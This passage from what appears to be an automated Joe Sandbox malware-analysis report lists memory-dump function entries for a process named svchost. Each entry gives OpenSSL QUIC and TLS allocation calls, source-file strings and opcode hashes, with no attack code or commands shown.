                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: ssl\quic\quic_txpim.c
                                                                                              • API String ID: 1208671065-1264249673
                                                                                              • Opcode ID: 7e93a71aea8a2c2b35f7c551a6759c251e52e404f019f45e104fe35a0f7229e8
                                                                                              • Instruction ID: 357f1f2ebba8ae2a87ee6ffa921b138acce6cf5691da6ced48aac76e1247596a
                                                                                              • Opcode Fuzzy Hash: 7e93a71aea8a2c2b35f7c551a6759c251e52e404f019f45e104fe35a0f7229e8
                                                                                              • Instruction Fuzzy Hash: 303119B2905F8181DB89CB25E5503A873E4FB59B84F18D23ADA9C87B65EF34D4E88300
                                                                                              Function 00007FFBAB46AA70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(00000000,00007FFBAB469F3B,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB46AAFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_txpim.c
                                                                                              • API String ID: 3931833713-1264249673
                                                                                              • Opcode ID: 865b6b66c0943add7dbc75e16454b2973e0d6fc8ac80a5cdc8e8ebd697424297
                                                                                              • Instruction ID: 893e17df98a5f519bce31fb7b31160f9f00bfbb860868f7f4c1db708d5c26153
                                                                                              • Opcode Fuzzy Hash: 865b6b66c0943add7dbc75e16454b2973e0d6fc8ac80a5cdc8e8ebd697424297
                                                                                              • Instruction Fuzzy Hash: FF218EA2F0ABC585EB418F29E5443A86360E758FC8F488536EF5D4776ADF38D5858300
                                                                                              Function 00007FFBAB468160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_memdup.LIBCRYPTO-3-X64(?,00007FFBAB44F46F,00000080,00007FFBAB450C3B,?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB4681CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_memdup
                                                                                              • String ID: ssl\quic\quic_txp.c
                                                                                              • API String ID: 560317026-3700743932
                                                                                              • Opcode ID: 5977bce0403a57f406f9bd1910c36523d19abcec362bab4b4b39ad297bab6391
                                                                                              • Instruction ID: d6f574b583230bf1bf8d5868df2eff0df861c2f8841e320b305e0ba13205a9d5
                                                                                              • Opcode Fuzzy Hash: 5977bce0403a57f406f9bd1910c36523d19abcec362bab4b4b39ad297bab6391
                                                                                              • Instruction Fuzzy Hash: 2611B672A09B8186E761CF21E5403AA77A0F748BC8F088535EF9D07B6ADF38E1918740
                                                                                              Function 00007FFBAB45C0D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45BB2D,?,00007FFBAB44B9F5), ref: 00007FFBAB45C14B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\quic_record_rx.c
                                                                                              • API String ID: 2581946324-3047069087
                                                                                              • Opcode ID: 41632703163fc184e1f730a83c7857f976f6e126df1b16ed371dbc01d2122129
                                                                                              • Instruction ID: a1c5d3b14a5f19e254bebd0405c691be52979fd30b0d551c986c2a2a7007c589
                                                                                              • Opcode Fuzzy Hash: 41632703163fc184e1f730a83c7857f976f6e126df1b16ed371dbc01d2122129
                                                                                              • Instruction Fuzzy Hash: D21100A2A0AF4181EE568B29D58063C63A5FB14FC8B24D535DE5C4B765EF3AD892C700
                                                                                              Function 00007FFBAB446BB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB447C34,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB446BFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_malloc
                                                                                              • String ID: ssl\quic\json_enc.c
                                                                                              • API String ID: 1457121658-3790216822
                                                                                              • Opcode ID: 520227716b19b7dedfebe6dff8fe468833264c619a161b17cb4a50cfbe25309b
                                                                                              • Instruction ID: e1743a65d8c585d0017632561b4d33f5ef608408f1ffb6fb255e8843d2c5bef8
                                                                                              • Opcode Fuzzy Hash: 520227716b19b7dedfebe6dff8fe468833264c619a161b17cb4a50cfbe25309b
                                                                                              • Instruction Fuzzy Hash: 3601C863D197C086E351CF28E44036D77A0EB68B8CF14E225EA8C03266EE76D5D2C300
                                                                                              Function 00007FFBAB452470 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: ssl\quic\quic_engine.c
                                                                                              • API String ID: 1208671065-2291346005
                                                                                              • Opcode ID: 648922d4ab1a19cc7422fba9d9f8158589d3270c5c315cc5acd99e9f39ede53f
                                                                                              • Instruction ID: dba02775f54882a8cf5299c5e4e2dff32f208d1c679dc78223ba056994f97a95
                                                                                              • Opcode Fuzzy Hash: 648922d4ab1a19cc7422fba9d9f8158589d3270c5c315cc5acd99e9f39ede53f
                                                                                              • Instruction Fuzzy Hash: 55015EB2706F0692DB518F26E58155C73B4FB48B84B448136DF6C07B65EF38D5A4C740
                                                                                              Function 00007FFBAB468850 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00007FFBAB468693,?,?,?,?,?,00000000,?,00007FFBAB467B71), ref: 00007FFBAB4688A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_txp.c
                                                                                              • API String ID: 3931833713-3700743932
                                                                                              • Opcode ID: 849aa596da2d9341a8a3c9e018e8c8689d0f91284e5937e868cf13a724cc43ee
                                                                                              • Instruction ID: 2df4fc2490f2acbe50d5a1e8bc0f31abe325ceb078873319b6eb726df6ce5e41
                                                                                              • Opcode Fuzzy Hash: 849aa596da2d9341a8a3c9e018e8c8689d0f91284e5937e868cf13a724cc43ee
                                                                                              • Instruction Fuzzy Hash: EFF0A4E2F2674183FF558721E5413682795EB54BC4F485436DE1C17795EF3CE5A28340
                                                                                              Function 00007FFBAB45E810 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: ssl\quic\quic_record_tx.c
                                                                                              • API String ID: 1208671065-2432027203
                                                                                              • Opcode ID: 48fc964fdf2c482615722f575e498f88e6913eb733bb01eb8e9e0a0df0d1b7b3
                                                                                              • Instruction ID: be613c0e56327eb716bf3e855b916a2dbda64149b8b54ff86d64a6cd4f62876f
                                                                                              • Opcode Fuzzy Hash: 48fc964fdf2c482615722f575e498f88e6913eb733bb01eb8e9e0a0df0d1b7b3
                                                                                              • Instruction Fuzzy Hash: 15014BB2605B4082DB15CB61E4912B833A8F7C8F54F198530DF5C83360CF38C991C250
                                                                                              Function 00007FFBAB411BE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc
                                                                                              • String ID: crypto\packet.c
                                                                                              • API String ID: 1208671065-224687097
                                                                                              • Opcode ID: 8f41ab5865570030e3ac35ecdd65f32c6f2111179410054ca95cff8d0d691fc0
                                                                                              • Instruction ID: 3069940e240e30ab6d21028399bba9d0b06e689e1ca1940253cc8688846445bb
                                                                                              • Opcode Fuzzy Hash: 8f41ab5865570030e3ac35ecdd65f32c6f2111179410054ca95cff8d0d691fc0
                                                                                              • Instruction Fuzzy Hash: 28F0BEB2E07B0181EB158B69E48536822A0EB08B58F648034DE1C473A1EF3ED8E2C380
                                                                                              Function 00007FFBAB46E6D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,00007FFBAB46E9BD,?,00007FFBAB46366B,?,?,00000000,?,00007FFBAB45A1A0,00000000,?,?,00007FFBAB459D9A,?,?), ref: 00007FFBAB46E6F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_malloc
                                                                                              • String ID: ssl\quic\uint_set.c
                                                                                              • API String ID: 1457121658-544055092
                                                                                              • Opcode ID: 1028996d009d5b2bba73af1a1b7a81eba610b63073fd91789b5daefa09d3f7b8
                                                                                              • Instruction ID: ff8bd2f8c8e72d1e1508724a757cce3b8ed87cf1e03c8161ad5700de8f6c1f33
                                                                                              • Opcode Fuzzy Hash: 1028996d009d5b2bba73af1a1b7a81eba610b63073fd91789b5daefa09d3f7b8
                                                                                              • Instruction Fuzzy Hash: AEF0EC62F65B4181EA468B21F18015C7750EFDCBC0F499131EE6C03755EE7CD9D48700
                                                                                              Function 00007FFBAB43C2C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\t1_lib.c
                                                                                              • API String ID: 2581946324-1168734446
                                                                                              • Opcode ID: b91348d09161cf71eaa999de320089278ad6071c5f35364df30b264030731374
                                                                                              • Instruction ID: f6b8ee6e500e18ff7e540b73b2896ac1a65ebf2b0e01a331d38019dd19f5ea7f
                                                                                              • Opcode Fuzzy Hash: b91348d09161cf71eaa999de320089278ad6071c5f35364df30b264030731374
                                                                                              • Instruction Fuzzy Hash: CFE06DE6F4F61385FE66D67AC4952781250AF49B88F188431DC2E876A3ED1DE4428701
                                                                                              Function 00007FFBAB47AFE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\statem\extensions.c
                                                                                              • API String ID: 2581946324-3728926295
                                                                                              • Opcode ID: 324a5f64d52da2c0b12b9a938cf8d8a58a21c8a3752ad9fbbb0e33a6079b6bfe
                                                                                              • Instruction ID: f2671e41f1a6f45fe5256f671a86aef2270a3b540516ea581059e4982bcfd18d
                                                                                              • Opcode Fuzzy Hash: 324a5f64d52da2c0b12b9a938cf8d8a58a21c8a3752ad9fbbb0e33a6079b6bfe
                                                                                              • Instruction Fuzzy Hash: 5EE046E2A0738182FB529B28D0893A82254EB05B48F585038DE1C4E3A2DF7E81CAC711
                                                                                              Function 00007FFBAB4162C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_clear_free.LIBCRYPTO-3-X64(?,00007FFBAB4178B4,00000000,00007FFBAB414AFF), ref: 00007FFBAB4162ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_free
                                                                                              • String ID: ssl\s3_enc.c
                                                                                              • API String ID: 2011826501-1240879137
                                                                                              • Opcode ID: 59a72ef481f06162f10a4088b1b897ac9434d0cd0cee74076ab6dac90c74b3f1
                                                                                              • Instruction ID: 28220a042a30aa795dfe386cd6928212e62495581ffb3155ee44532c00c6855c
                                                                                              • Opcode Fuzzy Hash: 59a72ef481f06162f10a4088b1b897ac9434d0cd0cee74076ab6dac90c74b3f1
                                                                                              • Instruction Fuzzy Hash: 79E01DA16D6583C5D791D775D8897EC13A4E708F84F144531DD5C87372DE28D1568350
                                                                                              Function 00007FFBAB45AB80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB45B2E0: OSSL_ERR_STATE_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD87,?,00007FFBAB4523E0), ref: 00007FFBAB45B323
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB455177), ref: 00007FFBAB45ABAB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: E_freeO_free
                                                                                              • String ID: ssl\quic\quic_port.c
                                                                                              • API String ID: 1398637539-1976217255
                                                                                              • Opcode ID: fd628b26613340bfcadcd802a080fa4b76abdfcbae82ac35fdd035ae1d5f9c46
                                                                                              • Instruction ID: 9f093a5a12a40fd48e1ece9378ac571f6bddd809c039150e66ac499ef715f541
                                                                                              • Opcode Fuzzy Hash: fd628b26613340bfcadcd802a080fa4b76abdfcbae82ac35fdd035ae1d5f9c46
                                                                                              • Instruction Fuzzy Hash: 2CD0A7D1F4730346FD27A371D846BB802000F08780E449130EE2D463A39D0CD6858742
                                                                                              Function 00007FFBAB4523F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\quic_engine.c
                                                                                              • API String ID: 2581946324-2291346005
                                                                                              • Opcode ID: 7f3c0570978d6f441575d252adf1a72b58b56be861ec3d7da58e6de7f37517db
                                                                                              • Instruction ID: d736a07e87bee27a489c41e2a08b4b8069180040c5af69185bebea6cdd9b3749
                                                                                              • Opcode Fuzzy Hash: 7f3c0570978d6f441575d252adf1a72b58b56be861ec3d7da58e6de7f37517db
                                                                                              • Instruction Fuzzy Hash: 5EC012D5F6702396FA56B334C4861B86150AF40300F84C531DA2C026A1DD1CA9194B00
                                                                                              Function 00007FFBAB434260 Relevance: 3.1, APIs: 2, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              • Opcode ID: dbd0b33c5df70f02e49e69ab67183b5b1874972946bebd73e3348968b97af6d7
                                                                                              • Instruction ID: 113e3c682d48b6bc30b9689a729851402ac6029fcac380b6794d41bc416dc846
                                                                                              • Opcode Fuzzy Hash: dbd0b33c5df70f02e49e69ab67183b5b1874972946bebd73e3348968b97af6d7
                                                                                              • Instruction Fuzzy Hash: FF217466B16B8182EA99CB66E5801AD6354FB84FE0F085331EF7D477E5DF28E4A14700
                                                                                              Function 649461C0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ddabd8780b840001ca8dd5c15dc82cddecc56236827651e302e8ea3c28ce6c7
                                                                                              • Instruction ID: 2047f6bf86ba71e83255fc360aae97fa77229f552fd7cf068d8c29cdd7335b30
                                                                                              • Opcode Fuzzy Hash: 5ddabd8780b840001ca8dd5c15dc82cddecc56236827651e302e8ea3c28ce6c7
                                                                                              • Instruction Fuzzy Hash: FE11D6B138538486FB198F69D840B5A27A9FB89BE8F045335EE1C47B85DB3CD841C750
                                                                                              Function 00007FFBAB434160 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
